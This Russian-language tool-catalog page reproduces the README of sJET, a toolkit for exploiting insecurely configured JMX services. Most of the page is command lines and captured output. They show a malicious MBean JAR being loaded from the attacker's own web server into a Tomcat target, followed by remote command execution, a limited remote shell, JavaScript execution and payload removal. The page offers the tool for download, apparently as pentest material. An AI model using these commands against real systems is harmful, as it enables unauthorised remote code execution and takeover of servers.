Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
sjet — siberas набор инструментов для эксплуатации JMX | Kitploit
Инструменты/GitHubGitHub/siberas/sjet
Генерация полезной нагрузкиЭксплуатацияКомандование и УправлениеИнструмент Удаленного Доступа
GitHubsiberas/sjet

sjet

siberas набор инструментов для эксплуатации JMX

Репозиторий
13391155 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

sJET от siberas

siberas JMX Exploitation Toolkit

sJET позволяет легко эксплуатировать небезопасно настроенные JMX-сервисы. Дополнительную справочную информацию можно найти здесь и здесь.

Предварительные требования

  • Jython 2.7

Использование

SJET реализует интерфейс командной строки (с использованием argparse):

root@kitploit:~
jython sjet.py targetHost targetPort password MODE (modeOptions)

Где

  • targetHost - IP-адрес цели
  • targerPort - порт цели, на котором работает JMX
  • password - пароль, который был установлен во время инсталляции
  • MODE - режим скрипта
  • modeOptions - параметры для выбранного режима

Режимы и параметры режимов

  • install - устанавливает полезную нагрузку на текущую цель
  • payload_url - полный URL для загрузки полезной нагрузки
  • payload_port - порт для загрузки полезной нагрузки
  • uninstall - удаляет полезную нагрузку с текущей цели
  • password - изменяет пароль на уже развернутой полезной нагрузке
    • password - новый пароль
  • command - выполняет команду CMD на целевой машине
    • CMD - команда для выполнения
  • shell - запускает простую оболочку на целевой машине (с ограничениями Java Runtime.exec())
  • javascript - выполняет javascript-файл FILENAME на целевой машине
    • FILENAME - javascript для выполнения
  • Пример

    Установка MBean полезной нагрузки на уязвимый JMX-сервис

    В следующем примере уязвимый JMX-сервис работает на 192.168.11.136:9991, атакующий имеет IP-адрес 192.168.11.132. JMX-сервис подключится к веб-сервису атакующего, чтобы загрузить JAR-файл полезной нагрузки. sJET запустит необходимый веб-сервис на порту 8000. После успешной установки MBean пароль по умолчанию изменяется на пароль, указанный в командной строке ("super_secret").

    root@kitploit:~
    h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret install http://192.168.11.132:8000 8000
    sJET - siberas JMX Exploitation Toolkit
    =======================================
    [+] Starting webserver at port 8000
    [+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
    [+] Connected: rmi://192.168.11.132  1
    [+] Loaded javax.management.loading.MLet
    [+] Loading malicious MBean from http://192.168.11.132:8000
    [+] Invoking: javax.management.loading.MLet.getMBeansFromURL
    192.168.11.136 - - [22/Aug/2017 22:38:00] "GET / HTTP/1.1" 200 -
    192.168.11.136 - - [22/Aug/2017 22:38:00] "GET /siberas_mlet.jar HTTP/1.1" 200 -
    [+] Successfully loaded MBeanSiberas:name=payload,id=1
    [+] Changing default password...
    [+] Loaded de.siberas.lab.SiberasPayload
    [+] Successfully changed password
    
    h0ng10@rocksteady:~/sjet$
    

    Выполнение команды 'ls -la' на Linux-цели:

    После установки полезной нагрузки мы можем использовать её для выполнения системных команд на цели.

    root@kitploit:~
    h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret command "ls -la"
    sJET - siberas JMX Exploitation Toolkit
    =======================================
    [+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
    [+] Connected: rmi://192.168.11.132  2
    [+] Loaded de.siberas.lab.SiberasPayload
    [+] Executing command: ls -la
    total 16
    drwxr-xr-x  4 root    root    4096 Aug 22 16:12 .
    drwxr-xr-x 66 root    root    4096 Aug 22 16:12 ..
    lrwxrwxrwx  1 root    root      12 Mär 29 01:46 conf -> /etc/tomcat8
    drwxr-xr-x  2 tomcat8 tomcat8 4096 Mär 29 01:46 lib
    lrwxrwxrwx  1 root    root      17 Mär 29 01:46 logs -> ../../log/tomcat8
    drwxrwxr-x  3 tomcat8 tomcat8 4096 Aug 22 16:12 webapps
    lrwxrwxrwx  1 root    root      19 Mär 29 01:46 work -> ../../cache/tomcat8
    
    
    [+] Done
    h0ng10@rocksteady:~/sjet$
    

    Запуск ping в режиме оболочки на цели

    Если вы не хотите загружать Java для каждой команды, вы можете использовать "режим оболочки", чтобы получить ограниченную командную оболочку.

    root@kitploit:~
    h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret shell
    sJET - siberas JMX Exploitation Toolkit
    =======================================
    [+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
    [+] Connected: rmi://192.168.11.132  3
    [+] Use command 'exit_shell' to exit the shell
    >>> ping -c 3 127.0.0.1
    [+] Loaded de.siberas.lab.SiberasPayload
    [+] Executing command: ping -c 3 127.0.0.1
    PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
    64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.075 ms
    64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.046 ms
    64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.044 ms
    
    --- 127.0.0.1 ping statistics ---
    3 packets transmitted, 3 received, 0% packet loss, time 2050ms
    rtt min/avg/max/mdev = 0.044/0.055/0.075/0.014 ms
    
    
    >>> exit_shell
    [+] Done
    h0ng10@rocksteady:~/sjet$
    

    Вызов JavaScript-полезной нагрузки на цели:

    Пример скрипта "javaproperties.js" отображает свойства Java уязвимого сервиса. Его можно вызвать следующим образом:

    root@kitploit:~
    h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret javascript scripts/javaproperties.js
    sJET - siberas JMX Exploitation Toolkit
    =======================================
    [+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
    [+] Connected: rmi://192.168.11.132  4
    [+] Loaded de.siberas.lab.SiberasPayload
    [+] Executing script
    java.vendor=Oracle Corporation
    sun.java.launcher=SUN_STANDARD
    catalina.base=/var/lib/tomcat8
    sun.management.compiler=HotSpot 64-Bit Tiered Compilers
    catalina.useNaming=true
    os.name=Linux
    ...
    java.vm.name=OpenJDK 64-Bit Server VM
    file.encoding=UTF-8
    java.specification.version=1.8
    
    
    h0ng10@rocksteady:~/sjet$
    

    Смена пароля

    Изменить существующий пароль ("super_secret") на "this-is-the-new-password":

    root@kitploit:~
    h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret password this-is-the-new-password
    sJET - siberas JMX Exploitation Toolkit
    =======================================
    [+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
    [+] Connected: rmi://192.168.11.132  6
    [+] Loaded de.siberas.lab.SiberasPayload
    [+] Successfully changed password
    
    [+] Done
    h0ng10@rocksteady:~/sjet$
    

    Удаление MBean полезной нагрузки с цели

    Удалить полезную нагрузку 'Siberas' с цели:

    root@kitploit:~
    minmaxer@prellermbp:~/sjet$ jython sjet.py 192.168.1.101 9010 super_secret uninstall
    sJET - siberas JMX Exploitation Toolkit
    =======================================
    [+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.1.101:9010/jmxrmi
    [+] Connected: rmi://192.168.1.1  16
    [+] MBean correctly uninstalled
    minmaxer@prellermbp:~/sjet$
    

    Вклад

    Не стесняйтесь вносить свой вклад.

    Авторы

    • Hans-Martin Münch - Первоначальная идея и работа - h0ng10
    • Patricio Reller - CLI и дополнительные параметры - preller

    См. также список участников, которые приняли участие в этом проекте.

    Лицензия

    Этот проект лицензирован по лицензии MIT - подробности см. в файле LICENSE.

    Скачать инструмент